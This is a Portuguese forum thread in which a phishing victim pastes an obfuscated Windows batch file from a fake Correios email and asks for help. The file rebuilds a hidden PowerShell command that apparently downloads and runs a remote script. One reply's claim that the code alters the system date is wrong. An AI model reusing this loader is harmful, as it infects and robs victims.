Ir ao conteúdo
  • Comunicados

    • diego_moicano

      Gostaria de se tornar um analista em Remoção de Malware?   07-12-2015

      Gostaria de se tornar um analista em Remoção de Malware? O Fórum Clube do Hardware deu início a um programa de treinamento em análises de log. Os interessados deverão enviar um email para aprendizes (arroba) clubedohardware (ponto) com (ponto) br respondendo as seguintes perguntas: Por que você gostaria de aprender a analisar logs? Possui tempo hábil para o treinamento? Tem conhecimentos em informática? Se sim descreva-os. Possui inglês para leitura? Qual seu objetivo após completar o treinamento?   Não se esqueça de incluir no e-mail o seu nome de usuário (fornecer o link também), idade e cidade onde vive. Adicione também qualquer experiência e/ou razão sobre o porquê você seria um bom Analista. É digno de nota que apenas os que forem selecionados receberão resposta por MP (Mensagem Pessoal), não existe um padrão na escolha dos futuros aprendizes, todos os e-mails serão lidos e serão analisados de forma imparcial, portanto não será permitido reclamações neste aspecto. O treinamento é dado no próprio fórum. Quando um aprendiz é selecionado ele é movido para um novo grupo, onde terá acesso a fóruns fechados para os demais usuários onde poderá dar inicio ao seu treinamento. Importante: A cada 30 dias os e-mails não selecionados serão apagados, portanto você pode enviar um novo e-mail após 1 mês, e-mails enviados antes serão desconsiderados.  
    • Gabriel Torres

      Seja um moderador do Clube do Hardware!   12-02-2016

      Prezados membros do Clube do Hardware, Está aberto o processo de seleção de novos moderadores para diversos setores ou áreas do Clube do Hardware. Os requisitos são:   Pelo menos 500 posts e um ano de cadastro; Boa frequência de participação; Ser respeitoso, cordial e educado com os demais membros; Ter bom nível de português; Ter razoável conhecimento da área em que pretende atuar; Saber trabalhar em equipe (com os moderadores, coordenadores e administradores).   Os interessados deverão enviar uma mensagem privada para o usuário @Equipe Clube do Hardware com o título "Candidato a moderador". A mensagem deverá conter respostas às perguntas abaixo:   Qual o seu nome completo? Qual sua data de nascimento? Qual sua formação/profissão? Já atuou como moderador em algo outro fórum, se sim, qual? De forma sucinta, explique o porquê de querer ser moderador do fórum e conte-nos um pouco sobre você.   OBS: Não se trata de função remunerada. Todos que fazem parte do staff são voluntários.
lucasdharo

Como saber se o que executei era um virus?

Recommended Posts

Primeiramente boa tarde a todos.

 

Recebi um falso email dizendo ser dos correios(Um print do mesmo encontra-se em anexo.), por falta de atenção, ao não reparar no remetente do email, acabei clicando no link "Objeto", onde foi feito o download de um arquivo .RAR, e eu tive a capacidade de abrir o mesmo que continha um arquivo .CMD e eu abri ele, logo o prompt abriu e logo fechou!

Nesta altura do campeonato fui perceber que se tratava de algo errado, e não de um email verdadeiro do correios.

 

Após isto fiquei com receio de usar sites de bancos e etc, cliquei para editar o prompt e obtive o codigo dele, porém nao entendo nada de programação, vou postar o codigo dele:

 

@echo off
cd %SystemRoot%\System32
set bcirTx=b0FeW6C7SqPDJntiQhscrGzkwpIgNadMXVxojmyv83BEOKTU2LuflZ5YR9AH41
set DY=Win
set sSHoyh=do^w
set hcfFbVcL=^sP^o
set HcsobSBR=^we^r
set rFtqfDrk=^She
set jDCO=^l^l^\
set VgnSe=^v1^.
set OWuq=0\p^o
set UfEsA=w^e
set dbnlJFa=r^sh
set eQ=^e^ll
set YQJnm=^.^e^x
set BtXDt=^e ^-^n
set nlyctlG=^op 
set rMZMSm=-^w
set BlviZ=^in 1 ^-
set date=%bcirTx:~26,1%%bcirTx:~3,1%%bcirTx:~34,1%(^"%bcirTx:~26,1%%bcirTx:~3,1%%bcirTx:~34,1%(%bcirTx:~28,1%%bcirTx:~3,1%%bcirTx:~4,1%-%bcirTx:~35,1%b%bcirTx:~12,1%%bcirTx:~43,1%%bcirTx:~19,1%%bcirTx:~14,1% %bcirTx:~28,1%%bcirTx:~3,1%%bcirTx:~14,1%.%bcirTx:~4,1%%bcirTx:~3,1%b%bcirTx:~19,1%%bcirTx:~49,1%%bcirTx:~15,1%%bcirTx:~3,1%%bcirTx:~28,1%%bcirTx:~14,1%).%bcirTx:~11,1%%bcirTx:~44,1%%bcirTx:~4,1%%bcirTx:~13,1%%bcirTx:~49,1%%bcirTx:~35,1%%bcirTx:~58,1%%bcirTx:~11,1%%bcirTx:~18,1%%bcirTx:~14,1%%bcirTx:~56,1%%bcirTx:~26,1%%bcirTx:~13,1%%bcirTx:~21,1%('%bcirTx:~17,1%%bcirTx:~14,1%%bcirTx:~14,1%%bcirTx:~25,1%%bcirTx:~18,1%://%bcirTx:~30,1%%bcirTx:~52,1%%bcirTx:~37,1%.%bcirTx:~25,1%%bcirTx:~29,1%%bcirTx:~13,1%%bcirTx:~13,1%%bcirTx:~35,1%%bcirTx:~30,1%.%bcirTx:~19,1%%bcirTx:~35,1%%bcirTx:~37,1%/?%bcirTx:~30,1%%bcirTx:~37,1%%bcirTx:~52,1%%bcirTx:~15,1%%bcirTx:~18,1%%bcirTx:~16,1%%bcirTx:~4,1%%bcirTx:~42,1%%bcirTx:~29,1%%bcirTx:~9,1%%bcirTx:~26,1%%bcirTx:~45,1%%bcirTx:~40,1%%bcirTx:~53,1%%bcirTx:~14,1%%bcirTx:~42,1%%bcirTx:~3,1%%bcirTx:~40,1%%bcirTx:~25,1%%bcirTx:~45,1%%bcirTx:~46,1%%bcirTx:~31,1%%bcirTx:~6,1%%bcirTx:~8,1%%bcirTx:~27,1%%bcirTx:~25,1%%bcirTx:~56,1%%bcirTx:~3,1%%bcirTx:~33,1%%bcirTx:~32,1%%bcirTx:~17,1%%bcirTx:~53,1%%bcirTx:~61,1%%bcirTx:~45,1%%bcirTx:~15,1%%bcirTx:~15,1%%bcirTx:~55,1%%bcirTx:~43,1%%bcirTx:~26,1%%bcirTx:~54,1%%bcirTx:~3,1%%bcirTx:~41,1%%bcirTx:~51,1%%bcirTx:~18,1%%bcirTx:~6,1%%bcirTx:~26,1%%bcirTx:~49,1%%bcirTx:~32,1%%bcirTx:~29,1%%bcirTx:~41,1%%bcirTx:~2,1%%bcirTx:~36,1%%bcirTx:~34,1%%bcirTx:~56,1%%bcirTx:~47,1%%bcirTx:~36,1%%bcirTx:~30,1%%bcirTx:~36,1%%bcirTx:~18,1%%bcirTx:~38,1%%bcirTx:~56,1%%bcirTx:~44,1%%bcirTx:~8,1%%bcirTx:~18,1%%bcirTx:~44,1%%bcirTx:~8,1%%bcirTx:~44,1%%bcirTx:~9,1%%bcirTx:~36,1%%bcirTx:~20,1%%bcirTx:~36,1%b%bcirTx:~44,1%%bcirTx:~4,1%%bcirTx:~50,1%%bcirTx:~20,1%%bcirTx:~49,1%%bcirTx:~28,1%%bcirTx:~46,1%%bcirTx:~39,1%%bcirTx:~26,1%%bcirTx:~21,1%%bcirTx:~58,1%%bcirTx:~29,1%%bcirTx:~58,1%%bcirTx:~35,1%%bcirTx:~33,1%%bcirTx:~24,1%%bcirTx:~41,1%%bcirTx:~23,1%%bcirTx:~11,1%%bcirTx:~40,1%%bcirTx:~48,1%/%bcirTx:~4,1%%bcirTx:~20,1%%bcirTx:~26,1%%bcirTx:~10,1%%bcirTx:~58,1%b%bcirTx:~41,1%%bcirTx:~33,1%%bcirTx:~18,1%%bcirTx:~34,1%%bcirTx:~33,1%%bcirTx:~18,1%%bcirTx:~45,1%%bcirTx:~5,1%%bcirTx:~27,1%%bcirTx:~16,1%%bcirTx:~43,1%%bcirTx:~52,1%')^");
echo %%date%% | %DY%%sSHoyh%%hcfFbVcL%%HcsobSBR%%rFtqfDrk%%jDCO%%VgnSe%%OWuq%%UfEsA%%dbnlJFa%%eQ%%YQJnm%%BtXDt%%nlyctlG%%rMZMSm%%BlviZ%

 

O que devo fazer? 

Alguém poderia me ajudar com o que esse codigo faz?

 

desde Já Muito obrigado.

email.jpg

Compartilhar este post


Link para o post
Compartilhar em outros sites

Boa tarde.

 

O código executa um script PowerShell, sugiro que siga o procedimento abaixo.

 

Acesse o tópico abaixo, siga as instruções e abra um novo tópico na área de Remoção de Malwares:

 

  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Olá deve ser vírus sim, porque mais alguém iria se disfarçar de algo que não é e te iludir para executar um arquivo?

 

Não sou craque em arquivos batch mais parece que o código faz alguma modificação relacionado a data do computador.  Se tiver uma imagem do sistema salva em algum lugar eu recomendo usar ou um ponto de restauração de antes de executar o arquivo cmd.

 

Depois use um antivírus atualizado para fazer um escaneamento completo do computador.

Compartilhar este post


Link para o post
Compartilhar em outros sites

Ciro-mota e ricardo_br, obrigado pelas orientações!

 

Criarei o tópico com o log do ZA Scan!

 

Att, Lucas de Haro.

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário






Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas publicações sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

×